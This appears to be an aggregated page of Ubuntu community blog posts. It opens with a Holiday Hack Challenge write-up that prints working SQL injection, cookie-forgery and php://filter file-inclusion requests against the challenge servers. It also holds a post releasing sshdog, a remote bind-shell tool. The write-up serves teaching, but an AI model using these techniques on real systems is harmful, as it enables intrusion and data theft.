You’ll notice that the nmap http-git script was successful in this case. This is a not-uncommon finding when developers use git to deploy an application directly to the document root (very common in the case of PHP applications, which is likely the case here due to the redirect to ‘login.php’). This is great, because we can download the entire git repository, which will allow us to look for secrets, credentials, hidden handlers, or at least better understand the application.

Now, it’s not possible to directly clone this over http because nobody ran git update-server-info, as they weren’t intending to share this over the network. But that’s okay with directory indexing enabled: we can just mirror all the files with wget, then clone out a working repository:

1
2
3
4
5
6
% wget --mirror https://analytics.northpolewonderland.com/.git
…
Downloaded: 314 files, 1003K in 0.4s (2.68 MB/s)
% git clone analytics.northpolewonderland.com/.git analytics
Cloning into 'analytics'...
done.

Looking at the source, we find a few interesting files (given that we know an audio file is at least one of our goals): there’s a getaudio.php that returns a download of an mp3 file from the database (storing the whole MP3 in a database column isn’t the design choice I would have made, but I suppose I’ll be discovering a lot of design choices I wouldn’t have made). It’s noteworthy that the only user it will allow to download a file is the user guest. I decided to try logging in with the credentials we found in the app earlier (guest:busyreindeer78), and was straight in. Conveniently, the top of the page has a link labeled “MP3”, and a click later we have discombobulatedaudio2.mp3.

That was easy, but I have reason to believe we’re not done here – if for no reason other than the fact that there are 2 references to the analytics server in the challenge description. There’s also quite a bit of functionality we haven’t tried out yet. I spent a few minutes reviewing the SQL queries in the application. They’re not parameterized queries (again, differing design decisions) but the liberal use of mysqli_real_escape_string seems to prevent any obvious SQL injection.

One notable feature is the ability to save analytics reports. It’s *particularly *notable that the way in which they are saved is by storing the final SQL query into a column in the reports table. There’s also an ‘edit’ function for these saved queries, which seems to be design just for renaming the saved reports, but if we look at the code, we easily see that we can edit any column stored in the database, including the stored SQL query. I’m honestly not sure what the right term is for this vulnerability (SQL injection implies injecting into an existing query, after all), but it’s clearly a vulnerability that will let us read arbitrary data from the database – including the stored MP3s, assuming we can access the edit functionality.

Code allowing any column to be updated:

1
2
3
4
5
6
7
8
9
10
$row = mysqli_fetch_assoc($result);
# Update the row with the new values
$set = [];
foreach($row as $name => $value) {
  print "Checking for " . htmlentities($name) . "...<br>";
  if(isset($_GET[$name])) {
    print 'Yup!<br>';
    $set[] = "$name='".mysqli_real_escape_string($db, $_GET[$name])."'";
  }
}

This edit function is allegedly restricted to not allow any users access:

(edit.php)

1
2
# Don't allow anybody to access this page (yet!)
restrict_page_to_users($db, []);

However, if we investigate the restrict_page_to_users function, we find that it calls check_access from db.php, which contains this code:

(db.php)

1
2
3
4
5
function check_access($db, $username, $users) {
  # Allow administrator to access any page
  if($username == 'administrator') {
    return;
  }

We now know that there’s probably an “administrator” user and that getting to that will allow us to access the edit.php page. Unfortunately, we don’t have credentials to log in as administrator, and we can’t use our arbitrary SQL to read the credentials until we have access. Stuck in a Catch-22? Not quite: who said we have to log in?

Earlier I foreshadowed the value of having access to the git repository for the site: session cookies are encrypted with symmetric crypto, and the key is available in the git repository:

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

This allows us to encrypt our own session cookie as administrator. I hacked together a short script to create a new AUTH cookie:

1
2
3
4
5
6
<?PHP
include('crypto.php');
print encrypt(json_encode([
  'username' => 'administrator',
  'date' => date(DateTime::ISO8601),
]));

Using my favorite cookie-editing extension to update my cookie, I quickly discover that the edit functionality is now available. Now, the edit page doesn’t provide an input field for the query, but thanks to Burp Suite, it’s easy enough to add my own parameter and edit the query. Based on getaudio.mp3, I know the schema for the audio table, so I craft a query to get it. Lacking an easy way to return the binary data directly (I can only execute this query within the context of an HTML page) I decide to return the MP3 encoded as a string. Base64 would probably be ideal to minimize overhead, but the TO_BASE64 function was added in 5.6 and I was too lazy to query the version from the database, so I encoded as hex instead.

I wanted the following query: SELECT `id`,`username`,`filename`,hex(`mp3`) FROM audio, so I POST’d to the following URL:

https://analytics.northpolewonderland.com/edit.php?id=1147b606-4d2f-4faa-b771-a55e03307367&name=foo&description=bar&query=SELECT+`id`,`username`,`filename`,hex(`mp3`)+FROM+audio

Then I ran the report with the saved report functionality, and extracted the hex and decoded it to reveal the other MP3 file. Based on the filename stored in the report, I saved it to my audio directory with the name discombobulatedaudio7.mp3. From the query results, we know these are the only 2 MP3s in the audio table, so it seems like it’s time to move on to the next server, but I decided to grab the passwords from the users table by updating the query again, just in case they might be useful later:

Addendum: An Unintentional Vulnerability

After finishing all of the challenges, I happened to be looking back at this one when I discovered a 2nd vulnerability, which I suspect was not intended as part of the challenge. If you notice the file query.php does a number of input validation checks, each looking something like this:

1
2
3
4
if(!ctype_alpha($field)) {
  reply(400, "Field name can only contain letters!");
  die();
}

You’ll notice the reply function sets the HTTP status code and prints a message, then the script dies to prevent further execution. However, if you look further down (line 178), you’ll discover this check and query construction:

1
2
3
4
5
6
7
8
9
$type = $_REQUEST['type'];
if($type !== 'launch' && $type !== 'usage') {
  reply(400, "Type has to be either 'launch' or 'usage'!");
}

$query = "SELECT * ";
$query .= "FROM `app_" . $type . "_reports` ";
$query .= "WHERE " . join(' AND ', $where) . " ";
$query .= "LIMIT 0, 100";

Though it appears the author intended to limit type to the strings ‘launch’ and ‘usage’, the lack of a call to die() in the error handler results in the query being executed and results returned anyway! So we can inject into the type field and steal the mp3 files using a UNION SELECT SQL injection:

1
curl 'https://analytics.northpolewonderland.com/query.php' -H 'Cookie: AUTH=82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d87e572ba65ce9b6548b3494b6063a30265b71c76884152' -H 'Content-Type: application/x-www-form-urlencoded' --data 'date=2017-01-05&type=usage_reports` LIMIT 0 UNION SELECT id,username,filename,to_base64(mp3),NULL from audio  -- '

ads.northpolewonderland.com

The nmap results for this host were rather unremarkable: essentially, yes, it’s a webserver. Visiting the full URL from the APK, the site returns directly an image file (no link? I guess these banner ads are for brick-and-mortar stores), so navigating to the root, we find the administration site for the ad system.

Fortunately, I had happened upon a helpful elf who informed me about this “Meteor” javascript framework, and the MeteorMiner script for extracting information from Meteor. Unfortunately, I had never seen Meteor before, so I had no idea what was going on. After trying some braindead attempts to steal the credentials for an administrator (Meteor.users.find().fetch() returned nothing), I attempted to register a new account to see if I could get access to more interesting functionality that way, but was repeatedly rebuffed by the site:

I began to look into how Meteor manages users, and guessed that they were using the default user management package. According to the documentation, you could add users for testing by calling the createUser method:

Accounts.createUser({password:'matirwuzhere', username:'matir'})

It turns out that this worked to create a user, and even directly logged me in as that user. Unfortunately, all of the pages still gave me a response of “You must be logged in to access this page”. I clicked around and generated dozens of requests and didn’t realize anything had meaningfully changed until I noticed that MeteorMiner was reporting a 5th member of the HomeQuote collection. Examining the collection in the javascript console revealed my prize: the path to an audio file, discombobulatedaudio5.mp3:

dev.northpolewonderland.com

Nmap gets us nothing here: just HTTP and SSH open. Visiting the webserver, we find nothing, literally. Just a “200 OK” response with no content. I can’t dirbuster (thanks Tom!), so how can I figure out what the web application might be doing?

Well, I have essentially two options: I can analyze the SantaGram APK, maybe use dex2jar and JAD (or another Java decompiler) to have semi-readable source, or maybe I can run the APK in an emulator and capture requests with Burp Suite. For several reasons, I decide to go with the 2nd route, not the least of which is that I spend a lot of time in Burp during my day-to-day, so I’ll be using the tools I’m more familiar with.

So I fire up the Android emulator with the proxy set to my Burp instance, install SantaGram with adb, and start playing with the app. It turns out this is another place that we can use the guest:busyreindeer78 credentials to log in, but no matter what I do in the app, I can’t seem to see any requests for dev.northpolewonderland.com. Looking at res/values/strings.xml from the APK, I see an important entry adjacent to the dev.northpolewonderland.com entry:

1
2
3
<string name="debug_data_collection_url">
    http://dev.northpolewonderland.com/index.php</string>
<string name="debug_data_enabled">false</string>

Well, I suppose it’s not sending requests to dev because debug_data_enabled is false. Let’s change that to true and rebuild the APK:

1
2
3
4
5
% apktool b -o santagram_mod.apk santagram
% /tmp/apk-resigner/signapk.sh ./santagram_mod.apk
% adb install santagram_mod.apk
% adb uninstall com.northpolewonderland.santagram
% adb install signed_santagram_mod.apk

It turns out rebuilding the APK was more troublesome than I anticipated because it needed to be resigned, and then the resigned one couldn’t be installed because it used a different key than the existing one, so I needed to uninstall the HHC SantaGram and install mine. (Clearly I need to do more mobile assessments.)

With the debug-enabled version installed, it was time to play with the app some more. While debugging the lack of debug requests, I noticed several references to the debug code in the user profile editing class, so I decided to give that a try and noticed (finally!) requests to dev.northpolewonderland.com.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: dev.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 144
{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400}
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 30 Dec 2016 20:09:37 GMT
Content-Type: application/json
Connection: close
Content-Length: 250
{"date":"20161230200937","status":"OK","filename":"debug-20161230200937-0.txt","request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":false}}

I noticed that the entire request is included in the response, plus a new field is added to the JSON: "verbose":false. Can we include that in the request, and maybe switch it to true? I send the request to Burp Repeater and add the verbose field, set to true:

1
2
3
4
5
6
7
8
POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: dev.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 159
{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true}

Unsurprisingly, the response changes, but we get way more than more details about our own debug message!

1
2
3
4
5
6
7
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 30 Dec 2016 23:01:56 GMT
Content-Type: application/json
Connection: close
Content-Length: 465
{"date":"20161230230156","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161230230156-0.txt","filename.len":26,"request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true},"files":["debug-20161224235959-0.mp3","debug-20161230224818-0.txt","debug-20161230225810-0.txt","debug-20161230230155-0.txt","debug-20161230230156-0.txt","index.php"]}

You’ll notice we got a listing of all the files in the current directory (they must be cleaning that up periodically!), including an mp3 file. Could this be the next discombobulatedaudioN.mp3? I download the file and get something of approximately the right size, but it’s not clear which of the discombobulated files it will be. All of the others had a filename in the discombobulated format (at least nearby, if not directly) so I set this one aside to be renamed later.

dungeon.northpolewonderland.com

Initial nmap results for dungeon.northpolewonderland.com weren’t revealing anything too interesting. Visting the webserver, I found what appears to be the help documentation for a Zork-style dungeon game. I remembered one of the elves offering up a copy of a game from a long time ago, so I went back and downloaded it.

I started playing the game briefly but, for as much as I love RPGs (I used to run several MUDs back in the 90s), I was impatient and wanted to get on with the Holiday Hack Challenge. I started with the obvious: running strings both on the binary and the data file, but that gave very little headway. I looked at Zork data file editors, but the first couple I found couldn’t decompile the provided data file (whether this is by accident, by design of the challenge, or because I picked the wrong tools, I have no idea), but that proved not to be useful. However, on one of the sites where I was reading about reversing Zork games, I discovered a mention of a built-in debugger called GDT, or the Game Debugger Tool. Among other things, GDT lets you dump all the information about NPCs, strings in the game, etc. Much like I would use GNU strings to get oriented to an unknown binary, I decided to use the GDT strings dump to find all of the in-game strings. Unfortunately, GDT required that I give it a string index and dump one at a time. Not knowing how many strings there were, I picked 2048 for a starting point and did a little inline shell script to dump them. I discovered that it starts to crash after about 1279, and the last handful seemed to be garbage (ok, no bounds checking, I wonder what else I could do?), so I decided to adjust my 2048 to 1200 and try again:

1
2
3
4
5
6
7
for i in seq 1 1200; do
    echo -n "$i: "
    echo -e "GDT\nDT\n$i\nEX\nquit\ny" | \
        ./dungeon 2>/dev/null | \
        tail -n +5 | \
        head -n -3
done

This produced a surprisingly readable strings table, except for some garbage at the end. (It appears the correct number of strings is 1027 for this particular game file.) At a quick glance, I notice some references to an “elf” near the end, while the rest of the seemed like pretty standard Zork gameplay. Most interesting seemed to be this line:

1
2
1024: >GDT>Entry:    The elf, satisified with the trade says - 
Try the online version for the true prize

Well great, I need to find an online version, but I didn’t find a clue as to where it would be from the webpage with instructions, nor did the rest of the strings in the offline version offer a hint. When in doubt – more recon! Time for a full NMAP scan (but I’ll leave scripts off in the interest of time):

1
2
3
4
5
6
7
8
9
10
Starting Nmap 7.31 ( https://nmap.org )
Nmap scan report for dungeon.northpolewonderland.com (35.184.47.139)
Host is up (0.066s latency).
rDNS record for 35.184.47.139: 139.47.184.35.bc.googleusercontent.com
Not shown: 64989 closed ports, 543 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
11111/tcp open  vce
Nmap done: 1 IP address (1 host up) scanned in 46.16 seconds

Aha! Port 11111 is open. I imagine netcat will give us an instance of the dungeon game. My first question is whether the “Try the online version for the true prize” string says something different:

1
2
3
4
5
6
7
8
9
10
% nc dungeon.northpolewonderland.com 11111
Welcome to Dungeon.			This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>GDT
GDT>DT
Entry:    1024
The elf, satisified with the trade says - 
send email to "peppermint@northpolewonderland.com" for that which you seek.

That was surprisingly easy – I really expected to need to do more. Maybe it’s misleading? I send an email off to Peppermint and wait with anticipation for Santa’s elves to do their work.

It turns out it really was that easy! Moments later, I have an email from Pepperment with an attachment: it’s discombobulatedaudio3.mp3!

ex.northpolewonderland.com

One last server to go! This server is apparently for handling uncaught exceptions from the application. To figure out what kind of traffic it’s seeing, I decided to try to trigger an exception in the application running in the emulator (still going from my work on dev.northpolewonderland.com). I actually stumbled upon this by mistake: if you change the device to be emulated to a Nexus 6, the application crashes and sends a crash report to ex.northpolewonderland.com.

1
2
3
4
5
6
7
8
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 3860
{"operation":"WriteCrashDump","data":{...}}

I’ve omitted the contents of “data” in the interest of space, but it mostly contained the traceback of the exception that was thrown. Interestingly, the response indicates that crashdumps are stored with a PHP extension, so my first thought was to try to include PHP code in the backtrace, but that never worked out (the code wasn’t being executed). I’m assuming the PHP interpreter wasn’t turned on for that directory.

1
2
3
4
5
6
7
8
9
10
HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 81
{
	"success" : true,
	"folder" : "docs",
	"crashdump" : "crashdump-QKMuKk.php"
}

It turns out there’s also a ReadCrashDump operation that you can provide a crashdump name and it will return the contents. You omit the php extension when sending the request, like so:

1
2
3
4
5
6
7
8
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 69
{"operation":"ReadCrashDump","data":{"crashdump":"crashdump-QKMuKk"}}

Given that I confirmed the crashdumps are in a folder “docs” relative to exception.php, I tried reading the “crashdump” ../exception to see if I could view the source, but that gives a 500 Internal Server Error. (Likely it keeps loading itself in an include() loop.) PHP, however, provides some creative ways to read data, filtering it inline. These pseudo-URLs for file opening result in different encodings and can be quite useful for bypassing LFI filters, non-printable characters for extracting binaries, etc. I chose to use one that encodes a file as base64 to see if I could get the source of exception.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 109
{"operation":"ReadCrashDump","data":{"crashdump":"php://filter/convert.base64-encode/resource=../exception"}}
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Sat, 31 Dec 2016 00:56:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3168
PD9waHAgCgojIEF1ZGlvIGZpbGUgZnJvbSBEaXNjb21ib2J1bGF0b3IgaW4gd2Vicm9vdDog
…
oZHVtcFsnY3Jhc2hkdW1wJ10gLiAnLnBocCcpOwoJfQkKfQoKPz4K

The base64 encoded output is a great sign. I decode it to discover, as expected, the contents of exception.php, which starts with this helpful hint:

1
2
<?php 
# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

So, there we have our final piece of the discombobulated audio: discombobulatedaudio6.mp3. This particular LFI was interesting for a few reasons: the use of chdir() to change directory instead of prepending the directory name, and the requirement that the file ends in .php. Had they prepended the directory name, a filter could not have been used because the filter must be at the beginning of the string passed to the PHP file open functions (like require, include, fopen).

Part 5: Discombobulated Audio

Fixing the Audio

We now have 7 audio files. Listening to each one, you don’t hear much, but the overall tone suggests to me that the final file has been slowed somewhat. So I open up Audacity and put all the files into one project. Then I used the option “Tracks > Align Tracks > Align End to End” to place the tracks into a series, with the resulting audio concatenated like this:

I wasn’t sure if numerical order would be the right order, but the amplitude of the end of each piece looked similar to the amplitude of the beginning of the next piece and playing the audio sounded rather continuous, but still unintelligible, so I decided to proceed. (I was hoping nobody was going to make me try all 5040 permutations of audio!) I merged the tracks together (via Tracks > Mix and Render) and then changed the tempo (via Effects > Change Tempo) by about 600%. It still didn’t sound quite right, but was close enough that I could make out the message:

“Merry Christmas, Santa Claus, or as I have always known him, Jeff”

It wasn’t clear to me what to do with the audio, or how this would help to find the kidnapper, but since there’s still one door that I didn’t have the password to (the corridor behind Santa’s office), I decided to try and see if this helped with getting past the door.

Santa’s Kidnapper

I was honestly a little surprised when the “Nice” light flashed and I was past the last locked door! As soon as I was through, I was in a small dark room with a ladder going up. I actually hesitated to click up the ladder, because part of me didn’t want the game to be over. But without anything else to do in the game (except collect NetWars coins… that took a little extra time) I clicked up the ladder, expecting a nefarious villain, and finding…. Dr. Who?

But why, Dr. Who, why? I can’t, for the life of me, imagine a reason to kidnap Santa Claus and take him back to 1978.

As told in his own words:

<Dr. Who> - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. People were happy there. It's a better life, I tell you, a better world than the scarred one we endure here.

Well, actually, I think I have to agree with the Doctor. The world would be a much better place without the Star Wars Holiday Special, but the ends do not justify the means, however Santa was returned in time to complete his Christmas rounds and deliver the toys via portal to all the white hat boys and girls of the world. (And perhaps a few of the grey hats too…)

on January 05, 2017 08:00 AM

Plasma 5.8.5 brings bug-fixes and translations from the month of December, thanks to the hard work of the Plasma team and the KDE Translation team.

To update, use the Software Repository Guide to add the following repository to your software sources list:

ppa:kubuntu-ppa/backports

Instructions on how to manage PPAs and more info about the Kubuntu PPAs can be found in the Repositories Documentation

on January 05, 2017 07:57 AM

January 04, 2017

For every request, IronFunctions would spin up a new container to handle the job, which depending on container and task could add a couple of 100ms of overhead.

So why not reuse the containers if possible? Well that is exactly what Hot Functions do.

Hot Functions improve IronFunctions throughput by 8x (depending on duration of task).

Hot Functions reside in long-lived containers addressing the same type of task, which take incoming workload and feed into their standard input and read from their standard output. In addition, permanent network connections are reused.

Here is how a hot function looks like. Currently, IronFunctions implements a HTTP-like protocol to operate hot containers, but instead of communication through a TCP/IP port, it uses standard input/output.

So to test this baby we deployed on 1 GB Digital Ocean instances (which is not much), and used Honeycomb to track and plot the performance.


Simple function printing "Hello World" called for 10s (MAX CONCURRENCY = 1).
Alt Text

Hot Functions have 162x higher throughput.


Complex function pulling image and md5 checksumming called for 10s (MAX CONCURRENCY = 1).
Hot Functions have 1,39x higher throughput.


By combining Hot Functions with concurrency we saw even better results:

Complex function pulling image and md5 checksumming called for 10s (MAX CONCURRENCY = 7)
Alt Text
Hot Functions have 7,84x higher throughput.


So there you have it, pure awesomeness by the Iron.io team in the making.

Also a big thank you to the good people from Honeycomb for their awesome product that allowed us to benchmark and plot (All the screenshots in this article are from Honeycomb). Its a great and fast new tool for debugging complex systems by combining the speed and simplicity of time series metrics with the raw accuracy and context of log aggregators.

Since it supports answering arbitrary, ad-hoc questions about those systems in real time, it was an awesome, flexible, powerful way for us to test IronFunctions!

on January 04, 2017 08:50 PM

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

Debian LTS

I was allocated 10 hours to work on security updates for Debian 7 Wheezy. During this time I did the following:

  • I released DLA-741-1 on unzip. This was an easy update.
  • I reviewed Roberto Sanchez’s patch for CVE-2014-9911 in ICU.
  • I released DLA-759-1 on nss in collaboration with Antoine Beaupré. I merged and updated Guido’s work to enable the testsuite during build and to add DEP-8 tests.
  • I created a git repository for php5 maintenance in Debian LTS and started to work on an update. I added patches for two CVE (CVE-2016-3141, CVE-2016-2554) and added some binary files required by (currently failing) tests.

Misc packaging

With the strong freeze approaching, I had some customer requests to push packages into Debian and/or to fix packages that were in danger of being removed from stretch.

While trying to bring back uwsgi into testing I filed #847095 (libmongoclient-dev: Should not conflict with transitional mongodb-dev) and #847207 (uwsgi: FTBFS on multiple architectures with undefined references to uwsgi_* symbols) and interacted on some of the RC bugs that were keeping the package out of testing.

I also worked on a few new packages (lua-trink-cjson, lua-inotify, lua-sandbox-extensions) that enhance hindsight in some use cases and sponsored a rozofs update in experimental to fix a file conflict with inn2 (#846571).

Misc Debian work

Debian Live. I released two live-build updates. The second update added more options to customize the grub configuration (we use it in Kali to override the theme and add more menu entries) both for EFI boot and normal boot.

Misc bugreports. #846569 on libsnmp-dev to accomodate the libssl transition (I noticed the package was not maintained, I asked for new maintainers on debian-devel). #847168 on devscripts for debuild that started failing when lintian was failing (unexpected regression). #847318 on lintian to not emit spurious errors for kali packages (which was annoying with the debuild regression above). #847436 for an upgrade problem I got with tryton-server. #847223 on firefoxdriver as it was still depending on iceweasel instead of firefox.

Sponsorship. I sponsored a new version of asciidoc (#831965) and of ssldump 0.9b3-6 (for libssl transition). I also uploaded a new version of mutter to fix #846898 (it was ready in SVN already).

Distro Tracker

Not much happening, I fixed #814315 by switching a few remaining URLs to https. I merged patches from efkin to fix the functional test suite (#814315), that was a really useful contribution! The same contributer started to tackle another ticket (#824912) about adding an API to retrieve action items. This is a larger project and needs some thoughts. I still have to respond to him on his latest patches (after two rounds already).

Misc stuff

I updated the letsencrypt-sh salt formula for version 0.3.0 and added the possibility to customize the hook script to reload the webserver.

The @planetdebian twitter account is no longer working since twitterfeed.com closed doors and the replacement (dlvr.it) is unhappy about the RSS feed of planet.debian.org. I filed bug #848123 against planet-venus since it does not preserve the isPermalink attribute in the guid tag

Thanks

See you next month for a new summary of my activities.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

on January 04, 2017 09:48 AM

New Tool: sshdog

David Tomaschik

I recently needed an encrypted, authenticated remote bind shell due to a situation where, believe it or not, the egress policies were stricter than ingress! Ideally I could forward traffic and copy files over the link.
I was looking for a good tool and casually asked my coworkers if they had any ideas when one said “sounds like SSH.”

Well, shit. That does sound like SSH and I didn’t even realize it. (Tunnel vision, and the value of bouncing ideas off of others.) But I had a few more requirements in total:

  • Encrypted
  • Authenticated
  • Bind (not reverse)
  • Windows & Linux
  • No Admin/Installation required
  • Can be shipped preconfigured
  • No special runtime requirements

At this point, I began hunting for SSH servers that fit the bill, but found none. So I began to think about Paramiko, the SSH library for Python, but then I’d still need the Python runtime (though there are ways to build a binary out of a python script). I then recalled once seeing that Go has an ssh package. I looked at it, hoping it would be as straightforward as Paramiko (which can become a full SSH server or client in about 10 lines), but it’s not quite so. With the Go package, all of the crypto is handled for you, but you need to handle the incoming channels and requests yourself. Fortunately, the package provides code for marshaling and unmarshaling messages from the SSH wire format.

I decided that I would get a better performance and more predictable behavior without needing to package the Python runtime, plus I appreciated the stability Go would provide (fewer runtime errors), so I began developing. What I ended up with is sshdog, and I’m releasing it today.

sshdog supports:

  • Windows & Linux
  • Configure port, host key, authorized keys
  • Pubkey authentication (no passwords)
  • Port forwarding
  • SCP (but no SFTP support)

Additionally, it’s capable of being installed as a service on Windows, and daemonizing on Linux. It uses go.rice to embed configuration within the resulting binary and give you a single executable that runs the server.

Example Usage

1
2
3
4
5
6
7
8
9
10
11
% go build .
% ssh-keygen -t rsa -b 2048 -N '' -f config/ssh_host_rsa_key
% echo 2222 > config/port
% cp ~/.ssh/id_rsa.pub config/authorized_keys
% rice append --exec sshdog
% ./sshdog
[DEBUG] Adding hostkey file: ssh_host_rsa_key
[DEBUG] Adding authorized_keys.
[DEBUG] Listening on :2222
[DEBUG] Waiting for shutdown.
[DEBUG] select...

Why sshdog?

The name is supposed to be a riff off netcat and similar tools, as well as an anagram for “Go SSHD”.

Please, give it a try and feel free to file bugs/pull requests on the Github project. https://github.com/Matir/sshdog.

on January 04, 2017 08:00 AM

January 03, 2017


What's yours?

Happy 2017!
:-Dustin
on January 03, 2017 10:36 PM
Now you can print your documents created in uWriter from your PC.

0.18 Print documents!

Setup: Enable access to your documents from a PC in an easy way:

In you phone's Terminal run this command:
ln -s /home/phablet/.local/share/uwp.costales/ /home/phablet/Documents/uWriter


Command just to be ran in the Terminal
This will create a link between ~/Documents/uWriter and /home/phablet/.local/share/uwp.costales

You'll do this step just one time. Now is easy to navigate to the uWriter folder in your PC.


Print a document

Connect your phone or tablet to the PC via USB and navigate to the uWriter folder (~/Documents/uWriter):

Your documents are saved as *.html

Open one document with  your favourite web browser
You document opened (in this case Firefox)
Print it!
That's all :) Enjoy it!
on January 03, 2017 07:14 PM

I’m specifically looking for:
OS/2 Metafile (.met)
PICT (Mac’s precursor to PDF) https://en.wikipedia.org/wiki/PICT

Also useful might be:
PCD – Kodak Photo CD
RAS – Sun Raster Image

I’m trying to evaluate if LibreOffice should keep support for them (specifically if the support is good). Unfortunately I can only generate the images using LibreOffice (or sister projects) which doesn’t really provide a great test.

Please either:
* Provide a link in a comment below
* Email me B @ (If emailed, please mention if I can share the image publicly)

If I find the support works great I’d try to integrate a few of them into LO tests so we make sure they don’t regress.

Thank you!  [Update, files are now part of LibreOffice’s test server]

 

on January 03, 2017 02:47 PM

January 02, 2017

So that was 2016! Here’s a summary of what I got up to on my computer(s) in December, a check of how I went against my plan, and the TODO list for the next month or so.

With a short holiday to Oslo, Christmas holidays, Christmas parties (at work and with Alexander at school, football etc.), travelling to Brussels with work, birthdays (Alexander & Antje), I missed a lot of deadlines, and failed to reach most of my Free Software goals (including my goals for new & updated packages in Debian Stretch – the soft freeze is in a couple of days). To top it all off, I lost my grandmother at the ripe old age of 93. Rest in peace Nana. I wish I could have made it to the funeral, but it is sometimes tough living on the other side of the world to your family.

Debian

Ubuntu

  • Added the Ubuntu Studio testsuites to the package tracker, and blogged about running the Manual Tests.

Other

Plan status & update for next month

Debian

Before the 5th January 2017 Debian Stretch soft freeze I hope to:

For the Debian Stretch release:

Ubuntu

  • Add the Ubuntu Studio Manual Testsuite to the package tracker, and try to encourage some testing of the newest versions of our priority packages. – Done
  • Finish the ubuntustudio-lightdm-theme, ubuntustudio-default-settings transition including an update to the ubuntustudio-meta packages. – Still to do
  • Reapply to become a Contributing Developer. – Still to do
  • Start working on an Ubuntu Studio package tracker website so that we can keep an eye on the status of the packages we are interested in. – Still to do
  • Start testing & bug triaging Ubuntu Studio packages.
  • Test Len’s work on ubuntustudio-controls

Other

  • Continue working to convert my Family History website to Jekyll – Done
  • Try and resurrect my old Gammon one-name study Drupal website from a backup and push it to the new GoONS Website project.
  • Give JMRI a good try out and look at what it would take to package it.

on January 02, 2017 10:58 PM

Enigma machine photo by Alessandro Nassiri [CC BY-SA 4.0], via Wikimedia Commons

Ubuntu Archive and CD/USB image use OpenPGP cryptography for verification and integrity protection. In 2012, a new archive signing key was created and we have started to dual-sign everything with both old and new keys.

In April 2017, Ubuntu 12.04 LTS (Precise Pangolin) will go end of life. Precise was the last release that was signed with just the old signing key. Thus when Zesty Zapus is released as Ubuntu 17.04, there will no longer be any supported Ubuntu release that require the 2004 signing keys for validation.

The Zesty Zapus release is now signed with just the 2012 signing key, which is 4096 RSA based key. The old 2004 signing keys, where were 1024 DSA based, have been removed from the default keyring and are no longer trusted by default in Zesty and up. The old keys are available in the removed keys keyring in the ubuntu-keyring package, for example in case one wants to verify things from old-releases.ubuntu.com.

Thus the signing key transition is coming to an end. Looking forward, I hope that by 18.04 LTS time-frame the SHA-3 algorithm will make its way into the OpenPGP spec and that we will possibly start a transition to 8096 RSA keys. But this is just wishful thinking as the current key strength, algorithm, and hashsums are deemed to be sufficient.
on January 02, 2017 01:54 PM

January 01, 2017

At the beginning of 2016 the Xubuntu team started a process to transition the project to become council-run rather than having a single project leader. After careful planning, writing and approving the general direction, the team was ready to vote on for the first three members of the council for the project.

In this article we explain what the new Xubuntu Council is and who the council members are.

What is the Xubuntu Council about?

The purpose of the council is very similar to the purpose of the former Xubuntu Project Leader (XPL): to make sure the direction of the project stays stable, in adherence to the Strategy Document and be responsible for making long-term plans and decisions where needed.

The two main differences between a council and the XPL, both favoring the council approach, are:

  • The administrative and bureaucratic work of managing the project is split between several people. This means more reliability and faster response times.
  • A council, with a diversity of views, can more fairly evaluate and arbitrate disputes.

Additionally, the council will stay more in the background in terms of daily decisions, the council does not have a casting or veto vote in the same way that the XPL had. We believe this lets us embrace the expertise in the team even more than we did before. The council also acts as a fallback to avoid deadlocks that a single point of failure like “an XPL gone missing” could produce.

